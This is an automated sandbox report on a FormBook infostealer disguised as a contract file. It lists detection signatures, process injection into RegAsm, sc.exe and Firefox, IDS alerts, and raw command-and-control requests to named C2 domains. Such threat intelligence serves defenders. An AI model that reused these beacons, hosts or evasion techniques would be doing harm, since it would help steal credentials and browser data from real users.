Windows Analysis Report
New Order - RCII900718_Contract Drafting.exe

Overview

General Information

Sample name: New Order - RCII900718_Contract Drafting.exe
Analysis ID: 1559084
MD5: ab7ce84e9de63dbe7082872755e8a87c
SHA1: cfe36e1ca460e9033dfcda4bbd2a1373feeb22b9
SHA256: bfb840367f7275924d9f1516fc214fbdd64118a5420bdd17a85d2e57ed9cd5b7
Tags: exe, Formbook, user-threatcat_ch
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • New Order - RCII900718_Contract Drafting.exe (PID: 1892 cmdline: "C:\Users\user\Desktop\New Order - RCII900718_Contract Drafting.exe" MD5: AB7CE84E9DE63DBE7082872755E8A87C)
    • RegAsm.exe (PID: 2308 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • ZrTbKDhAWYKJu.exe (PID: 4208 cmdline: "C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sc.exe (PID: 1608 cmdline: "C:\Windows\SysWOW64\sc.exe" MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • ZrTbKDhAWYKJu.exe (PID: 1068 cmdline: "C:\Program Files (x86)\AUomrIcGckQctbQWdqxqsuxfByONsHfvVvkOjafMplh\ZrTbKDhAWYKJu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 984 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
1.2.RegAsm.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-20T07:16:10.362783+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49811 | 108.179.253.197 | 80 | TCP
2024-11-20T07:16:33.637770+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49963 | 108.181.189.7 | 80 | TCP
2024-11-20T07:16:47.040281+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50010 | 13.248.169.48 | 80 | TCP
2024-11-20T07:17:10.487544+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50014 | 23.225.159.42 | 80 | TCP
2024-11-20T07:16:10.362783+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49811 | 108.179.253.197 | 80 | TCP
2024-11-20T07:16:33.637770+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49963 | 108.181.189.7 | 80 | TCP
2024-11-20T07:16:47.040281+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50010 | 13.248.169.48 | 80 | TCP
2024-11-20T07:17:10.487544+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50014 | 23.225.159.42 | 80 | TCP
2024-11-20T07:16:25.981190+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49910 | 108.181.189.7 | 80 | TCP
2024-11-20T07:16:28.502632+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49928 | 108.181.189.7 | 80 | TCP
2024-11-20T07:16:31.393915+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49944 | 108.181.189.7 | 80 | TCP
2024-11-20T07:16:39.358769+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49999 | 13.248.169.48 | 80 | TCP
2024-11-20T07:16:41.914657+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50008 | 13.248.169.48 | 80 | TCP
2024-11-20T07:16:44.486980+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50009 | 13.248.169.48 | 80 | TCP
2024-11-20T07:17:02.315974+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50011 | 23.225.159.42 | 80 | TCP
2024-11-20T07:17:04.831630+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50012 | 23.225.159.42 | 80 | TCP
2024-11-20T07:17:07.409732+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50013 | 23.225.159.42 | 80 | TCP

                AV Detection

                Source: New Order - RCII900718_Contract Drafting.exe, Avira: detected
                Source: New Order - RCII900718_Contract Drafting.exe, ReversingLabs: Detection: 31%
                Source: New Order - RCII900718_Contract Drafting.exe, Virustotal: Detection: 33%
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2241932701.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: New Order - RCII900718_Contract Drafting.exe, Joe Sandbox ML: detected
                Source: New Order - RCII900718_Contract Drafting.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: New Order - RCII900718_Contract Drafting.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: RIDE.pdb source: New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721869696.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, New Order - RCII900718_Contract Drafting.exe, 00000000.00000002.1721792816.0000000000FE0000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ZrTbKDhAWYKJu.exe, 00000005.00000000.2167494215.000000000054E000.00000002.00000001.01000000.00000007.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2977812837.000000000054E000.00000002.00000001.01000000.00000007.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2242299628.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2240309306.0000000003638000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: RegAsm.pdb source: sc.exe, 00000006.00000002.2977665984.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2979542481.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.000000000257C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.0000000029ECC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: sc.pdbUGP source: ZrTbKDhAWYKJu.exe, 00000005.00000002.2978143078.0000000000997000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2240670631.0000000002820000.00000040.00001000.00020000.00000000.sdmp, sc.exe, sc.exe, 00000006.00000003.2242299628.00000000037EA000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000003.2240309306.0000000003638000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2978912261.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: RegAsm.pdb4 source: sc.exe, 00000006.00000002.2977665984.000000000325E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 00000006.00000002.2979542481.0000000003FBC000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.000000000257C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.0000000029ECC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: sc.pdb source: ZrTbKDhAWYKJu.exe, 00000005.00000002.2978143078.0000000000997000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\sc.exeCode function: 6_2_02F2CA10 FindFirstFileW,FindNextFileW,FindClose,6_2_02F2CA10
                Source: C:\Windows\SysWOW64\sc.exeCode function: 4x nop then xor eax, eax6_2_02F19F90
                Source: C:\Windows\SysWOW64\sc.exeCode function: 4x nop then pop edi6_2_02F1E5AA
                Source: C:\Windows\SysWOW64\sc.exeCode function: 4x nop then mov ebx, 00000004h6_2_037204EE

                Networking

                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49928 -> 108.181.189.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50008 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49963 -> 108.181.189.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49963 -> 108.181.189.7:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50014 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50014 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49944 -> 108.181.189.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49999 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50009 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50010 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50010 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50011 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50012 -> 23.225.159.42:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49811 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49910 -> 108.181.189.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49811 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50013 -> 23.225.159.42:80
                Source: DNS query: www.avalanchefi.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
                Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                Source: Joe Sandbox ViewASN Name: ASN852CA ASN852CA
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /7n6c/?Vblddl=ePeKNPyUeLpNn1ut9QR5+vkaHUGSQvJrwPLb6fKcgQCso5jGZqjP6M9GYYTFao+4npn6icqsLwsi7nEjf66UvTUwrIE2dD1LfojjSGoioIp2xNG+LZcOM+Y=&At=4ZW0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bloodbalancecaps.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /xu9o/?Vblddl=Y1SnkQLh9oyCIrW0o0O4vqPemXX8Spt1zoY93P6OWbCvdS06v54NadN0bxhIZaxlyI96f1lIInN9xaPSBVcrMr8DLl9ZyJ18b2nxQ81rZE0uLnMg7aaVIRg=&At=4ZW0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jalan2.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /ctta/?At=4ZW0&Vblddl=73htI/07lnbi6jhjvkNHrlWSa6BSjsKivRRSV4arkt57XDlKC2xJvna+Jje1nWd5k0Z3PS0VVZTw4ek7NFPoag2/xWEWhdCP8yoM02bo7Rk5ZALP8w8OFi4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.avalanchefi.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /dfeq/?Vblddl=gAXULa6m81FP6NaNWEaqYxdrDcJADutaGDMyuCCNna1Q7N6mqkEUlVDne0yRrfV+N8trXlbxkU4RIowztTRv+FQMMrCoDDJ1FGnXoByL22JcZjp7VwlUZtI=&At=4ZW0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.laohub10.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: www.bloodbalancecaps.shop
                Source: global trafficDNS traffic detected: DNS query: www.jalan2.online
                Source: global trafficDNS traffic detected: DNS query: www.avalanchefi.xyz
                Source: global trafficDNS traffic detected: DNS query: www.02760.wang
                Source: global trafficDNS traffic detected: DNS query: www.laohub10.net
                Source: unknownHTTP traffic detected: POST /xu9o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.jalan2.onlineOrigin: http://www.jalan2.onlineReferer: http://www.jalan2.online/xu9o/Content-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 203Cache-Control: max-age=0User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; nl-nl; GT-P5210 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Wed, 20 Nov 2024 06:16:25 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: closeData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a Data Ascii: a
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachedate: Wed, 20 Nov 2024 06:16:28 GMTserver: LiteSpeedcontent-encoding: gzipvary: Accept-Encodingtransfer-encoding: chunkedconnection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmlcache-control: private, no-cache, max-age=0pragma: no-cachecontent-length: 1249date: Wed, 20 Nov 2024 06:16:33 GMTserver: LiteSpeedconnection: close
                Source: sc.exe, 00000006.00000002.2979542481.00000000043A4000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.0000000002964000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2532705070.000000002A2B4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://bloodbalancecaps.shop/7n6c/?Vblddl=ePeKNPyUeLpNn1ut9QR5
                Source: ZrTbKDhAWYKJu.exe, 00000007.00000002.2977906300.00000000005DC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.laohub10.net
                Source: ZrTbKDhAWYKJu.exe, 00000007.00000002.2977906300.00000000005DC000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.laohub10.net/dfeq/
                Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: sc.exe, 00000006.00000002.2979542481.00000000049EC000.00000004.10000000.00040000.00000000.sdmp, ZrTbKDhAWYKJu.exe, 00000007.00000002.2978983691.0000000002FAC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn-bj.trafficmanager.net/?h=
                Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: sc.exe, 00000006.00000002.2981404488.000000000819E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.li
                Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth
                Source: sc.exe, 00000006.00000003.2421392598.0000000003294000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:

                E-Banking Fraud

                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2978480170.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2240548681.00000000025C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2977494208.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2239985044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2978393331.00000000035C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2978629154.00000000025F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2241932701.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample, Static PE information: Filename: New Order - RCII900718_Contract Drafting.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Process Stats: CPU usage > 49%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042CDA3 NtClose,1_2_0042CDA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892B60 NtClose,LdrInitializeThunk,1_2_02892B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_02892C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_02892DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028935C0 NtCreateMutant,LdrInitializeThunk,1_2_028935C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02894340 NtSetContextThread,1_2_02894340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02894650 NtSuspendThread,1_2_02894650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892AB0 NtWaitForSingleObject,1_2_02892AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892AD0 NtReadFile,1_2_02892AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892AF0 NtWriteFile,1_2_02892AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892B80 NtQueryInformationFile,1_2_02892B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892BA0 NtEnumerateValueKey,1_2_02892BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892BE0 NtQueryValueKey,1_2_02892BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892BF0 NtAllocateVirtualMemory,1_2_02892BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892E80 NtReadVirtualMemory,1_2_02892E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892EA0 NtAdjustPrivilegesToken,1_2_02892EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892EE0 NtQueueApcThread,1_2_02892EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892E30 NtWriteVirtualMemory,1_2_02892E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892F90 NtProtectVirtualMemory,1_2_02892F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892FA0 NtQuerySection,1_2_02892FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892FB0 NtResumeThread,1_2_02892FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892FE0 NtCreateFile,1_2_02892FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892F30 NtCreateSection,1_2_02892F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892F60 NtCreateProcessEx,1_2_02892F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892CA0 NtQueryInformationToken,1_2_02892CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892CC0 NtQueryVirtualMemory,1_2_02892CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892CF0 NtOpenProcess,1_2_02892CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892C00 NtQueryInformationProcess,1_2_02892C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892C60 NtCreateKey,1_2_02892C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892DB0 NtEnumerateKey,1_2_02892DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892DD0 NtDelayExecution,1_2_02892DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892D00 NtSetInformationFile,1_2_02892D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892D10 NtMapViewOfSection,1_2_02892D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892D30 NtUnmapViewOfSection,1_2_02892D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02893090 NtSetValueKey,1_2_02893090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02893010 NtOpenDirectoryObject,1_2_02893010
